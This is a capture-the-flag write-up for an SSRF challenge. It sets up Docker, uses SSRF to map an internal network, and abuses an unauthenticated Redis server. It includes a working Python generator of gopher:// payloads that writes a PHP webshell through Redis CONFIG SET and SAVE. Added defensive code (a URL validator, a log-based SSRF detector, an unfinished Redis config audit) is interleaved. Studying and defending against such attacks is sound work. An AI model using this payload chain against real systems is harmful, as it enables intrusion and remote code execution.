Open Competition Web: ssrfme
Contents
[Techniques tested by the challenge]
1. Docker configuration
1.1 Installation
1.2 Configuration
1.3 Restart Docker and test
2. SSRF environment setup
2.1 Prepare and extract the files
2.2 Pull the environment
2.3 Access test
2.3.1 Checking whether the environment is set up correctly
3. Vulnerability analysis and reproduction
3.1 Testing whether SSRF exists
3.2 Obtaining the internal IP range
3.3 Internal host detection
3.4 Port scanning
3.5 Redis unauthorized access attack
3.5.1 Writing the payload
3.5.2 Scanning the host
3.5.3 Writing the payload again
[Techniques tested by the challenge]
- SSRF
- Redis unauthorized access
- Using SSRF to attack Redis on an internal host
1. Docker configuration
1.1 Installation
root@abyss:~# apt install docker.io
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
bridge-utils containerd git git-man liberror-perl pigz runc ubuntu-fan
Suggested packages:
ifupdown aufs-tools btrfs-progs cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2 docker-doc rinse zfs-fuse | zfsutils git-daemon-run
| git-daemon-sysvinit git-doc git-email git-gui gitk gitweb git-cvs git-mediawiki git-svn
The following NEW packages will be installed:
bridge-utils containerd docker.io git git-man liberror-perl pigz runc ubuntu-fan
0 upgraded, 9 newly installed, 0 to remove and 67 not upgraded.
Need to get 82.5 MB of archives.
After this operation, 321 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 pigz amd64 2.6-1 [63.6 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 bridge-utils amd64 1.7-1ubuntu3 [34.4 kB]
Get:3 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 runc amd64 1.1.12-0ubuntu2~22.04.1 [8,405 kB]
Get:4 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 containerd amd64 1.7.24-0ubuntu1~22.04.2 [37.3 MB]
Get:5 http://cn.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 docker.io amd64 26.1.3-0ubuntu1~22.04.1 [32.5 MB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 liberror-perl all 0.17029-1 [26.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git-man all 1:2.34.1-1ubuntu1.12 [955 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git amd64 1:2.34.1-1ubuntu1.12 [3,165 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 ubuntu-fan all 0.12.16 [35.2 kB]
Fetched 82.5 MB in 2min 48s (490 kB/s)
Preconfiguring packages ...
Selecting previously unselected package pigz.
(Reading database ... 211881 files and directories currently installed.)
Preparing to unpack .../0-pigz_2.6-1_amd64.deb ...
Unpacking pigz (2.6-1) ...
Selecting previously unselected package bridge-utils.
Preparing to unpack .../1-bridge-utils_1.7-1ubuntu3_amd64.deb ...
Unpacking bridge-utils (1.7-1ubuntu3) ...
Selecting previously unselected package runc.
Preparing to unpack .../2-runc_1.1.12-0ubuntu2~22.04.1_amd64.deb ...
Unpacking runc (1.1.12-0ubuntu2~22.04.1) ...
Selecting previously unselected package containerd.
Preparing to unpack .../3-containerd_1.7.24-0ubuntu1~22.04.2_amd64.deb ...
Unpacking containerd (1.7.24-0ubuntu1~22.04.2) ...
Selecting previously unselected package docker.io.
Preparing to unpack .../4-docker.io_26.1.3-0ubuntu1~22.04.1_amd64.deb ...
Unpacking docker.io (26.1.3-0ubuntu1~22.04.1) ...
Selecting previously unselected package liberror-perl.
Preparing to unpack .../5-liberror-perl_0.17029-1_all.deb ...
Unpacking liberror-perl (0.17029-1) ...
Selecting previously unselected package git-man.
Preparing to unpack .../6-git-man_1%3a2.34.1-1ubuntu1.12_all.deb ...
Unpacking git-man (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package git.
Preparing to unpack .../7-git_1%3a2.34.1-1ubuntu1.12_amd64.deb ...
Unpacking git (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package ubuntu-fan.
Preparing to unpack .../8-ubuntu-fan_0.12.16_all.deb ...
Unpacking ubuntu-fan (0.12.16) ...
Setting up runc (1.1.12-0ubuntu2~22.04.1) ...
Setting up liberror-perl (0.17029-1) ...
Setting up bridge-utils (1.7-1ubuntu3) ...
Setting up pigz (2.6-1) ...
Setting up git-man (1:2.34.1-1ubuntu1.12) ...
Setting up containerd (1.7.24-0ubuntu1~22.04.2) ...
Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service.
Setting up ubuntu-fan (0.12.16) ...
Created symlink /etc/systemd/system/multi-user.target.wants/ubuntu-fan.service → /lib/systemd/system/ubuntu-fan.service.
Setting up docker.io (26.1.3-0ubuntu1~22.04.1) ...
Adding group `docker' (GID 137) ...
Done.
Created symlink /etc/systemd/system/multi-user.target.wants/docker.service → /lib/systemd/system/docker.service.
Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket.
Setting up git (1:2.34.1-1ubuntu1.12) ...
Processing triggers for man-db (2.10.2-1) ...
1.2 Configuration
root@abyss:~# cd /etc/systemd/system/
root@abyss:/etc/systemd/system# ls -all
total 128
drwxr-xr-x 21 root root 4096 4月 7 15:58 .
drwxr-xr-x 5 root root 4096 4月 5 23:55 ..
drwxr-xr-x 2 root root 4096 9月 11 2024 bluetooth.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 cloud-final.service.wants
lrwxrwxrwx 1 root root 42 4月 5 23:50 dbus-fi.w1.wpa_supplicant1.service -> /lib/systemd/system/wpa_supplicant.service
lrwxrwxrwx 1 root root 37 4月 5 23:50 dbus-org.bluez.service -> /lib/systemd/system/bluetooth.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.Avahi.service -> /lib/systemd/system/avahi-daemon.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.ModemManager1.service -> /lib/systemd/system/ModemManager.service
lrwxrwxrwx 1 root root 53 4月 5 23:50 dbus-org.freedesktop.nm-dispatcher.service -> /lib/systemd/system/NetworkManager-dispatcher.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.oom1.service -> /lib/systemd/system/systemd-oomd.service
lrwxrwxrwx 1 root root 44 4月 5 23:50 dbus-org.freedesktop.resolve1.service -> /lib/systemd/system/systemd-resolved.service
lrwxrwxrwx 1 root root 36 4月 5 23:50 dbus-org.freedesktop.thermald.service -> /lib/systemd/system/thermald.service
lrwxrwxrwx 1 root root 45 4月 5 23:50 dbus-org.freedesktop.timesync1.service -> /lib/systemd/system/systemd-timesyncd.service
lrwxrwxrwx 1 root root 32 4月 5 23:50 display-manager.service -> /lib/systemd/system/gdm3.service
drwxr-xr-x 2 root root 4096 9月 11 2024 display-manager.service.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 emergency.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 final.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 getty.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 graphical.target.wants
drwxr-xr-x 2 root root 4096 4月 9 11:10 multi-user.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 network-online.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 oem-config.service.wants
drwxr-xr-x 2 root root 4096 4月 5 23:55 open-vm-tools.service.requires
drwxr-xr-x 2 root root 4096 9月 11 2024 paths.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 printer.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 rescue.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 sleep.target.wants
-rw-r--r-- 1 root root 311 9月 11 2024 snap-bare-5.mount
-rw-r--r-- 1 root root 326 9月 11 2024 snap-core22-1612.mount
-rw-r--r-- 1 root root 326 4月 7 15:58 snap-core22-1802.mount
drwxr-xr-x 2 root root 4096 4月 7 15:58 snapd.mounts.target.wants
-rw-r--r-- 1 root root 329 9月 11 2024 snap-firefox-4848.mount
-rw-r--r-- 1 root root 344 9月 11 2024 'snap-gnome\x2d42\x2d2204-176.mount'
-rw-r--r-- 1 root root 359 9月 11 2024 'snap-gtk\x2dcommon\x2dthemes-1535.mount'
-rw-r--r-- 1 root root 326 9月 11 2024 snap-snapd-21759.mount
-rw-r--r-- 1 root root 380 9月 11 2024 'snap-snapd\x2ddesktop\x2dintegration-178.mount'
-rw-r--r-- 1 root root 380 4月 7 15:58 'snap-snapd\x2ddesktop\x2dintegration-253.mount'
-rw-r--r-- 1 root root 338 9月 11 2024 'snap-snap\x2dstore-1113.mount'
-rw-r--r-- 1 root root 338 4月 7 15:58 'snap-snap\x2dstore-1216.mount'
drwxr-xr-x 2 root root 4096 4月 9 11:10 sockets.target.wants
lrwxrwxrwx 1 root root 31 4月 5 23:57 sshd.service -> /lib/systemd/system/ssh.service
lrwxrwxrwx 1 root root 9 4月 5 23:50 sudo.service -> /dev/null
drwxr-xr-x 2 root root 4096 4月 5 23:54 sysinit.target.wants
lrwxrwxrwx 1 root root 35 4月 5 23:50 syslog.service -> /lib/systemd/system/rsyslog.service
drwxr-xr-x 2 root root 4096 4月 6 00:37 timers.target.wants
lrwxrwxrwx 1 root root 41 4月 5 23:55 vmtoolsd.service -> /lib/systemd/system/open-vm-tools.service
root@abyss:/etc/systemd/system# mkdir docker.service.d
root@abyss:/etc/systemd/system# cd docker.service.d/
root@abyss:/etc/systemd/system/docker.service.d# ls -all
total 8
drwxr-xr-x 2 root root 4096 4月 9 11:11 .
drwxr-xr-x 22 root root 4096 4月 9 11:11 ..
root@abyss:/etc/systemd/system/docker.service.d# vim http-proxy.conf
root@abyss:/etc/systemd/system/docker.service.d# cat http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://192.168.142.1:7897"
Environment="HTTPS_PROXY=http://192.168.142.1:7897"
Environment="NO_PROXY=localhost,127.0.0.1,*.example.com"
root@abyss:/etc/systemd/system/docker.service.d#
1.3 Restart Docker and test
root@abyss:/etc/systemd/system/docker.service.d# systemctl daemon-reload
root@abyss:/etc/systemd/system/docker.service.d# systemctl restart docker
root@abyss:/etc/systemd/system/docker.service.d# ps -ef | grep docker
root 6029 1 2 11:32 ? 00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 6184 4730 0 11:32 pts/1 00:00:00 grep --color=auto docker
# try a docker search for nginx to check that the daemon works through the proxy
root@abyss:/etc/systemd/system/docker.service.d# docker search nginx
NAME DESCRIPTION STARS OFFICIAL
nginx Official build of Nginx. 20738 [OK]
nginx/nginx-ingress NGINX and NGINX Plus Ingress Controllers fo… 103
nginx/nginx-prometheus-exporter NGINX Prometheus Exporter for NGINX and NGIN… 49
nginx/unit This repository is retired, use the Docker o… 65
nginx/nginx-ingress-operator NGINX Ingress Operator for NGINX and NGINX P… 2
nginx/nginx-quic-qns NGINX QUIC interop 1
nginx/nginxaas-loadbalancer-kubernetes 1
nginx/unit-preview Unit preview features 0
bitnami/nginx Bitnami container image for NGINX 199
ubuntu/nginx Nginx, a high-performance reverse proxy & we… 128
bitnamicharts/nginx Bitnami Helm chart for NGINX Open Source 0
rancher/nginx 2
kasmweb/nginx An Nginx image based off nginx:alpine and in… 8
linuxserver/nginx An Nginx container, brought to you by LinuxS… 229
dtagdevsec/nginx T-Pot Nginx 0
paketobuildpacks/nginx 0
vmware/nginx 2
chainguard/nginx Build, ship and run secure software with Cha… 4
droidwiki/nginx 0
gluufederation/nginx A customized NGINX image containing a consu… 1
intel/nginx 0
circleci/nginx This image is for internal use 2
corpusops/nginx https://github.com/corpusops/docker-images/ 1
antrea/nginx Nginx server used for Antrea e2e testing 0
docksal/nginx Nginx service image for Docksal 0
2. SSRF environment setup
2.1 Prepare and extract the files
2.2 Pull the environment
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Command 'docker-compose' not found, but can be installed with:
snap install docker # version 27.5.1, or
apt install docker-compose # version 1.29.2-1 // recommended; the snap method above tends to cause problems
See 'snap info docker' for additional versions.
// docker-compose is not installed, so install it
root@abyss:~/web_ssrf/web-ssrfme# apt install docker-compose
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools python3-texttable
python3-websocket
Suggested packages:
python-attr-doc python-jsonschema-doc python-setuptools-doc
The following NEW packages will be installed:
docker-compose python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools
python3-texttable python3-websocket
0 upgraded, 12 newly installed, 0 to remove and 67 not upgraded.
Need to get 911 kB of archives.
After this operation, 4,842 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 python3-distutils all 3.10.8-1~22.04 [139 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-websocket all 1.2.3-1 [34.7 kB]
Get:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docker all 5.0.3-1 [89.3 kB]
Get:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dockerpty all 0.4.1-2 [11.1 kB]
Get:5 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docopt all 0.6.2-4 [26.9 kB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dotenv all 0.19.2-1 [20.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-attr all 21.2.0-1 [44.0 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 python3-setuptools all 59.6.0-1.2ubuntu0.22.04.2 [340 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-pyrsistent amd64 0.18.1-1build1 [55.5 kB]
Get:10 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-jsonschema all 3.2.0-0ubuntu2 [43.1 kB]
Get:11 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-texttable all 1.6.4-1 [11.4 kB]
Get:12 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 docker-compose all 1.29.2-1 [95.8 kB]
Fetched 911 kB in 2s (602 kB/s)
Selecting previously unselected package python3-distutils.
(Reading database ... 213203 files and directories currently installed.)
Preparing to unpack .../00-python3-distutils_3.10.8-1~22.04_all.deb ...
Unpacking python3-distutils (3.10.8-1~22.04) ...
Selecting previously unselected package python3-websocket.
Preparing to unpack .../01-python3-websocket_1.2.3-1_all.deb ...
Unpacking python3-websocket (1.2.3-1) ...
Selecting previously unselected package python3-docker.
Preparing to unpack .../02-python3-docker_5.0.3-1_all.deb ...
Unpacking python3-docker (5.0.3-1) ...
Selecting previously unselected package python3-dockerpty.
Preparing to unpack .../03-python3-dockerpty_0.4.1-2_all.deb ...
Unpacking python3-dockerpty (0.4.1-2) ...
Selecting previously unselected package python3-docopt.
Preparing to unpack .../04-python3-docopt_0.6.2-4_all.deb ...
Unpacking python3-docopt (0.6.2-4) ...
Selecting previously unselected package python3-dotenv.
Preparing to unpack .../05-python3-dotenv_0.19.2-1_all.deb ...
Unpacking python3-dotenv (0.19.2-1) ...
Selecting previously unselected package python3-attr.
Preparing to unpack .../06-python3-attr_21.2.0-1_all.deb ...
Unpacking python3-attr (21.2.0-1) ...
Selecting previously unselected package python3-setuptools.
Preparing to unpack .../07-python3-setuptools_59.6.0-1.2ubuntu0.22.04.2_all.deb ...
Unpacking python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Selecting previously unselected package python3-pyrsistent:amd64.
Preparing to unpack .../08-python3-pyrsistent_0.18.1-1build1_amd64.deb ...
Unpacking python3-pyrsistent:amd64 (0.18.1-1build1) ...
Selecting previously unselected package python3-jsonschema.
Preparing to unpack .../09-python3-jsonschema_3.2.0-0ubuntu2_all.deb ...
Unpacking python3-jsonschema (3.2.0-0ubuntu2) ...
Selecting previously unselected package python3-texttable.
Preparing to unpack .../10-python3-texttable_1.6.4-1_all.deb ...
Unpacking python3-texttable (1.6.4-1) ...
Selecting previously unselected package docker-compose.
Preparing to unpack .../11-docker-compose_1.29.2-1_all.deb ...
Unpacking docker-compose (1.29.2-1) ...
Setting up python3-dotenv (0.19.2-1) ...
Setting up python3-distutils (3.10.8-1~22.04) ...
Setting up python3-attr (21.2.0-1) ...
Setting up python3-texttable (1.6.4-1) ...
Setting up python3-docopt (0.6.2-4) ...
Setting up python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Setting up python3-pyrsistent:amd64 (0.18.1-1build1) ...
Setting up python3-websocket (1.2.3-1) ...
Setting up python3-dockerpty (0.4.1-2) ...
Setting up python3-docker (5.0.3-1) ...
Setting up python3-jsonschema (3.2.0-0ubuntu2) ...
Setting up docker-compose (1.29.2-1) ...
Processing triggers for man-db (2.10.2-1) ...
// bring up the environment
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Creating network "web-ssrfme_default" with the default driver
Building redis
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
Install the buildx component to build images with BuildKit:
https://docs.docker.com/go/buildx/
Sending build context to Docker daemon 7.983MB
Step 1/19 : FROM ubuntu:16.04
16.04: Pulling from library/ubuntu
58690f9b18fc: Pull complete
b51569e7c507: Pull complete
da8ef40b9eca: Pull complete
fb15d46c38dc: Pull complete
......
Successfully built 4be6c24dabe9
Successfully tagged ctf/ssrfme:latest
WARNING: Image for service web was built because it did not already exist. To rebuild this image you must use `docker-compose build` or `docker-compose up --build`.
Creating web-ssrfme_redis_1 ... done
Creating web-ssrfme_web_1 ... done
// check the ports Docker has mapped
root@abyss:~/web_ssrf/web-ssrfme# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8da4dc9e2730 ctf/ssrfme "/bin/sh -c 'cd /; .…" 3 minutes ago Up 3 minutes 0.0.0.0:8091->80/tcp, :::8091->80/tcp web-ssrfme_web_1
d05b13308fc8 web-ssrfme_redis "/usr/local/bin/dock…" 3 minutes ago Up 3 minutes 6379/tcp web-ssrfme_redis_1
root@abyss:~/web_ssrf/web-ssrfme#
2.3 Access test
2.3.1 Checking whether the environment is set up correctly
Visit <VM IP address>:<Docker mapped port>. If the code shown above appears, the environment is set up correctly.
3. Vulnerability analysis and reproduction
3.1 Testing whether SSRF exists
The source code takes a url GET parameter. Test with www.baidu.com whether SSRF exists; the result shown above confirms that it does. The next steps are to determine the internal subnet, find out which internal hosts are alive, and then write a file through Redis unauthorized access and obtain the flag.
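The fix on the application side, as an added example that is not part of the writeup or of the challenge source: a validator for the url parameter described above, to be run before the server fetches anything. It assumes a policy of public http/https web servers only, and takes an injectable resolver so the check can be exercised without DNS; the default resolver and the policy constants are this example's own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy assumed for this added example: the fetcher may only reach public
# web servers on standard ports. Neither the policy nor these helpers come
# from the challenge code.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def default_resolver(host):
    """Return every address the name currently maps to, as strings."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(ip_text):
    """True only for globally routable addresses. is_global is False for
    RFC 1918 space such as 172.18.0.0/16, loopback, link-local (which covers
    cloud metadata endpoints), CGNAT, multicast and the unspecified address."""
    return ipaddress.ip_address(ip_text).is_global


def check_fetch_url(url, resolver=default_resolver):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (allowed, reason). The resolver is injectable so the check can be
    unit-tested without DNS; in production the address that passed this check
    must be the one actually connected to, or DNS rebinding bypasses it."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        return False, "malformed url: %s" % exc
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % (parts.scheme or "")
    if parts.username is not None or parts.password is not None:
        return False, "credentials in url"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port is not None and port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port
    try:
        literal = ipaddress.ip_address(host)  # also covers [::1] style hosts
    except ValueError:
        literal = None
    if literal is not None:
        if not literal.is_global:
            return False, "non-public ip literal: %s" % literal
        return True, "ok"
    try:
        addresses = resolver(host)
    except OSError as exc:  # socket.gaierror is a subclass of OSError
        return False, "dns failure: %s" % exc
    if not addresses:
        return False, "name resolved to nothing"
    for addr in addresses:  # every record must be public, not just the first
        if not is_public(addr):
            return False, "%s resolves to non-public %s" % (host, addr)
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://www.baidu.com/", "http://172.18.0.2:6379/",
                      "gopher://172.18.0.2:6379/_", "http://127.0.0.1/?info"):
        print(candidate, check_fetch_url(candidate))
```

The address that passed the check has to be the one the HTTP client actually connects to; validating the name and then letting the client resolve it again leaves a rebinding window. Redirects need the same check applied to every hop, since a public host can 302 to an internal one.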
3.2 Obtaining the internal IP range
The source code contains phpinfo(), triggered by the info parameter; it prints the host's IP address, so try it.
The host IP printed here is 172.18.0.3, which means the internal subnet is 172.18.0.x. Next, detect which internal hosts are alive.
3.3 Internal host detection
Brute-forcing with Yakit shows that the host at 172.18.0.2 is alive and runs an HTTP service.
Knowing which hosts are alive is not enough, though; we still need an entry point, so use the SSRF to scan the ports and see whether a Redis service is present.
3.4 Port scanning
Scanning the ports with Yakit shows that port 6379 responds with -ERR wrong number of arguments for 'get' command 1, which is a Redis error. That error means host 172.18.0.2 is also running Redis, so a Redis unauthorized access attack can be tried.
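From the detection side, as an added example that is not part of the writeup: the host and port enumeration in 3.3 and 3.4 leaves a distinctive trail in the web server's access log, because every probe goes through the same url parameter. The script below parses constructed nginx-format log lines (not logs from the challenge), flags fetch targets with non-http schemes, private addresses or unusual ports, and reports clients that touched several distinct internal host:port pairs. It also peels the extra URL-encoding layer that the double-encoded payloads in 3.5.1 carry, which a single-decode analyzer would miss. Log format, threshold and sample traffic are all this example's assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in nginx "combined" format; the challenge's real logs are
# not part of the writeup. Client 10.0.0.5 walks an internal host's ports
# through the url parameter, then switches to gopher (once single-, once
# double-encoded); 10.0.0.9 fetches a public page.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Apr/2025:11:40:01 +0000] "GET /?url=http://www.baidu.com HTTP/1.1" 200 2381 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2025:11:40:12 +0000] "GET /?url=http://172.18.0.2:80/ HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2025:11:40:13 +0000] "GET /?url=http://172.18.0.2:22/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2025:11:40:13 +0000] "GET /?url=http://172.18.0.2:6379/ HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2025:11:40:14 +0000] "GET /?url=http://172.18.0.4:80/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2025:11:41:02 +0000] "GET /?url=gopher%3A%2F%2F172.18.0.2%3A6379%2F_ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Apr/2025:11:41:30 +0000] "GET /?url=gopher%253A%252F%252F172.18.0.2%253A6379%252F_ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Apr/2025:11:42:00 +0000] "GET /?url=https://example.org/ HTTP/1.1" 200 1256 "-" "curl/8.5"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)
SAFE_SCHEMES = {"http", "https"}
SAFE_PORTS = {None, 80, 443}


def target_of(path, param="url"):
    """Return (scheme, host, port) of the fetch target named in the query, or None."""
    values = parse_qs(urlsplit(path).query).get(param)
    if not values:
        return None
    target = values[0]          # parse_qs already removed one encoding layer
    for _ in range(2):          # peel the extra layers a double-encoded payload carries
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    parts = urlsplit(target)
    try:
        port = parts.port
    except ValueError:
        port = None
    return parts.scheme.lower(), parts.hostname or "", port


def analyze(log_text, scan_threshold=3):
    """Flag suspicious fetch targets per request and report clients that touched
    scan_threshold or more distinct internal (host, port) pairs."""
    flagged = []
    internal_targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = target_of(m["path"])
        if target is None:
            continue
        scheme, host, port = target
        flags = []
        if scheme not in SAFE_SCHEMES:
            flags.append("non-http scheme:" + scheme)
        try:
            if not ip_address(host).is_global:
                flags.append("internal target")
                internal_targets[m["client"]].add((host, port))
        except ValueError:
            pass                # hostname rather than an IP literal
        if port not in SAFE_PORTS:
            flags.append("unusual port:%d" % port)
        if flags:
            flagged.append((m["client"], m["ts"], scheme, host, port, flags))
    scanners = {c: sorted(t, key=str) for c, t in internal_targets.items()
                if len(t) >= scan_threshold}
    return flagged, scanners


if __name__ == "__main__":
    hits, scanners = analyze(SAMPLE_LOG)
    for client, ts, scheme, host, port, flags in hits:
        print(client, ts, "%s://%s:%s" % (scheme, host, port), ", ".join(flags))
    for client, targets in scanners.items():
        print("internal scan from %s: %d distinct targets" % (client, len(targets)))
```

The scheme and private-address flags fire on a single request, so they are the high-confidence alert; the distinct-target count is what separates the enumeration in 3.3 and 3.4 from one stray internal fetch. The threshold is arbitrary and should be tuned to the application's normal traffic.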
3.5 Redis unauthorized access attack
The host 172.18.0.2 runs both an HTTP service and Redis, so we go for Redis unauthorized access. First find a way to write the payload onto 172.18.0.2, then use the SSRF to request the payload directly, triggering it and obtaining the flag.
3.5.1 Writing the payload
Since 172.18.0.2 runs an HTTP service, first test whether a file can be written directly into the html directory.
The payload generation script is as follows:
import urllib.parse

protocol = "gopher://"
ip = "172.18.0.2"  # IP of the internal host running Redis
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "web.php"
path = "/var/www/html/upload"
passwd = ""

cmd = [
    "flushall",
    # spaces inside the value are swapped for ${IFS} so the split on " " below keeps it whole
    "set 1 {}".format(shell.replace(" ", "${IFS}")),
    "config set dir {}".format(path),
    "config set dbfilename {}".format(filename),
    "save"
]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))

payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # encode one command as a RESP array: *<argc>, then $<len> and the argument for each
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)
URL-encode the output a second time, because the payload is URL-decoded twice when it is written: once by the browser and once by Redis. As follows:
However, the html directory does not seem to be directly writable; there was no response at all during this test:
And visiting the file only shows the following, which means the write failed:
3.5.2 Scanning the host
Since the payload cannot be written directly into the html directory, scan the host 172.18.0.2 with Burp Suite to see whether there are other directories under html that would allow the payload to be written.
The scan results are as follows:
As the results show, there is an upload directory; next, test writing the payload there.
3.5.3 Writing the payload again
This time a tool is used to generate the payload. Gopherus is an open-source tool on GitHub, but as of 2025 it is rather old: it depends on Python 2, which therefore has to be installed on Ubuntu. After installation it is used as follows:
After obtaining the payload, URL-encode it a second time as before and write it using the same method. I then had a look inside the container, and the shell.php file was already there.
Then visiting ?url=http://172.18.0.2/upload/shell.php in the browser yields the flag.
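Finally, from the Redis side, as an added example not taken from the writeup or the challenge image: the chain in 3.5.1 and 3.5.3 only works because Redis accepts unauthenticated connections from the web container, still exposes CONFIG SET dir / CONFIG SET dbfilename / SAVE, and can write under the web root. The audit below reads a redis.conf and reports each of those conditions. Both configs are constructed for the example (the challenge's real redis.conf is not shown), and the placeholder password is exactly that.

```python
# Both configurations are constructed for this added example; the challenge's
# actual redis.conf is not shown in the writeup.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html/upload
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command SAVE ""
dir /var/lib/redis
"""

# Commands the writeup's payload relies on: CONFIG SET dir/dbfilename chooses
# where the dump lands, SAVE writes it, FLUSHALL empties the keyspace first.
ABUSED_COMMANDS = ("CONFIG", "FLUSHALL", "SAVE")


def parse_conf(text):
    """Minimal redis.conf reader: directive -> value, plus a rename-command map.
    Values containing '#' would need quoting; this reader does not handle that."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "rename-command":
            cmd, _, new_name = value.partition(" ")
            renamed[cmd.upper()] = new_name.strip().strip('"')   # "" means disabled
        else:
            directives[key] = value
    return directives, renamed


def audit(text, web_roots=("/var/www",)):
    """Return the findings that make the SSRF-to-Redis chain in the writeup work."""
    conf, renamed = parse_conf(text)
    findings = []
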